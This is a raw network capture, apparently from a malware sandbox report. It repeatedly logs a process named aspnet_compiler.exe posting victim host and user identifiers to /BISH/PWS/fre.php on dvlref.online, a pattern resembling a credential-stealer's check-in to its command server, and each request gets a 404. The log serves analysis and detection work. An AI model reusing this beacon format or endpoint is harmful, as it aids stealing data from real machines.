Dec 2, 2024 14:47:35.118350029 CET	801	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:47:34 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cUaynUwbaCm5f%2FqWaYzyaIHBxhbDpppNqkqtNng2V%2BPbsYmoC7MjzuRWzam7xRPDe3tK%2F%2Bjx0gTIcNlNxFwymqzu4OiQSQp6kF6sepIk923%2BTd0LHTz%2BFdPIzJ6cI6ZY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc505eea07cfa-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1859&min_rtt=1859&rtt_var=929&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.7	49895	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:47:35.382344961 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:47:35.503757954 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:47:36.699984074 CET	798	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:47:36 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KZMANK9j2Jj1ko%2BEIsWvqO7wI2FGF5ADkrksF8Qy0hoPLQT7%2F6ncbjZQlWycHLLHXj%2FcdMCz0kHcssmFp7LrKklfk4SMaHQZ3rHcRwFpERrIMxhv%2BqvuYzKFYH44wJjV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc50fe89a8c8f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2017&min_rtt=2017&rtt_var=1008&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.7	49900	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:47:36.975333929 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:47:37.095474005 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:47:37.396651983 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:47:38.338171005 CET	796	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:47:38 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BExkprNWdD39oPQStu0%2FkqHSkiCZRsk4F5uj%2B9xSgcnoq8jQCigRqpbCnAq0Zct2MyZNqKYSm3e4RnzClUcwFqf3r2NycOuKhTwoJRwtHf5iNfvXjaj5BgsEJfl7W5gL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc51a2a3542d0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2019&min_rtt=2019&rtt_var=1009&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=195&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.7	49906	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:47:38.602385998 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:47:38.724664927 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:47:40.145010948 CET	797	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:47:39 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nbxuXP6sF2ovyE%2FH0%2Fz4KHZmET73QdOerZgSO1jlWsjYKkwv3KkxCUUsvxSw9TU6d1W4GeOtO6JVUuQgJYZSWHwLxz%2FKlyhpmNxzn6tZgX3mLWPrWB%2Fsj6O8NnTINXuv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc524cd0a4285-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2511&min_rtt=2511&rtt_var=1255&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.7	49909	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:47:40.423372030 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:47:40.543502092 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:47:41.813971996 CET	789	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:47:41 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BV7XE4x9aCyxYSkfUSfA9SkEX3Kn2zPYG5IA91eWKxuJJmXSvBykTuCynp8kniOJcf9M0Re68Q48u7qkpbSRo2pB7gOqve3UAcq3XkNKrxwxP1CLlrgItcVHKtjQhxr6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc52fb817425d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1554&min_rtt=1554&rtt_var=777&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.7	49914	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:47:42.082954884 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:47:42.203054905 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:47:43.461189032 CET	795	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:47:43 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VZH1nqx2LxdOi383B9WDAG4NSaFPUsQoh2BbKj5HY%2Bz%2FVECl4tQlDC2IDXk6XXw0sorrlmPhJQc7cbYH%2BICXVVcoihCrGrRsKxEhgHz41upDfoYuzm4sncypYxSUGPmi"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc53a19968c9b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1965&min_rtt=1965&rtt_var=982&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.7	49919	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:47:43.725852966 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:47:43.845850945 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:47:45.080813885 CET	803	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:47:44 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h7dpb41PqJe5xyMcAssTCKUI10JR5p6KkSkEWFaqb3wVu5qFYbJgFT01IkWsmq5xw6%2By%2B%2BK1ZCaJs%2FRycfbaq8bzc5sy%2BIDrxrgizxWJuryO5rYkUsJgcE%2Fs%2BuGGM5NC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc5446df77cff-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1837&min_rtt=1837&rtt_var=918&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.7	49925	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:47:45.644150019 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:47:45.764255047 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:47:46.974601030 CET	791	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:47:46 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=98IVuVhPRSO4pDwJei3JLcvE5EMZZkKucwS1fR11DWn0cj8v8fkS8hLHiQe0TP1J32RyB9cFBig8Le3T1W9SIGS7groQ%2F4qYPZuYR1XkEzZjPS3Pd1iSlsJEPPuEaCJm"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc5500fe5426d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1592&min_rtt=1592&rtt_var=796&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.7	49929	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:47:47.241712093 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:47:47.361856937 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:47:48.600413084 CET	799	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:47:48 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sgbwDOHpb1P12%2FSKQn8BXUMOGZBPakQx0Ao7nepmIZKl2c4AF6JDHtMw9s2vF1%2B0T1Fu1KrVqFYcs0YHUsH4wo%2FnPoEeVEo9VRBypQj%2BsX9P1ksgRjVSJRT%2BA05IYxPq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc55a2f034362-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1755&min_rtt=1755&rtt_var=877&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.7	49933	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:47:48.939040899 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:47:49.059293032 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:47:50.298413992 CET	797	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:47:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VnLtwEg3w3p5CmG%2BnCUgJ8Eo3gFcjI8jvsOxbl1bgQc6DF2tfaDlt%2BEZtWOCYqJzBySjLhpNM0UBM5aUpgwcmURZeSvRLSkNQUyzke%2Fl%2BpgEc0aDDiv1qUMKcjIAi50J"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc564fe0e4210-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1594&min_rtt=1594&rtt_var=797&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.7	49939	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:47:50.579684973 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:47:50.699604034 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:47:51.921442986 CET	797	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:47:51 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pIm1LaUYkIjXL%2BMdNx7fsQh5YgP1lYdDV%2F9Tnz4ZHv8WOO5%2BtBPYTdyqTLG9OjUIVOW5VTQUGYk0cbYKfiWt7ClZr6%2BciLr4fCKMNeAKGp0aZUApBuGJbvMvqwX35ukU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc56f2c2f42e5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1720&min_rtt=1720&rtt_var=860&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.7	49943	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:47:52.200128078 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:47:52.320146084 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:47:53.503700972 CET	797	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:47:53 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1kxNrVRcbxTI4Yh5P1o%2B%2BALeZNIxADr%2FeIkSdP%2FJhS7RsFeMXLivoRtKxstUxhstJBxcwjWEP33BJMcYFpa1EfLlTluKvF9qzcmyUdNqz5vbKQCzXRN4J7lAgdbUDNC7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc5790afc7c99-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1942&min_rtt=1942&rtt_var=971&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.7	49947	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:47:53.778733969 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:47:53.899018049 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:47:55.071896076 CET	795	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:47:54 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yLahBiXtdqt6AeRCrBYcipcm7rTL6vP%2Fx1q2SEwm05%2BK%2BIC6mEb34af6mZkpsuVIRmo9vratTstHnNJ9Un34Ld8BZLdkd0zTPhPq1IOnPfmyxMNwrgCUtN9ayg3Am4vZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc582eeb243c8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1784&min_rtt=1784&rtt_var=892&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.7	49952	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:47:55.333815098 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:47:55.453881025 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
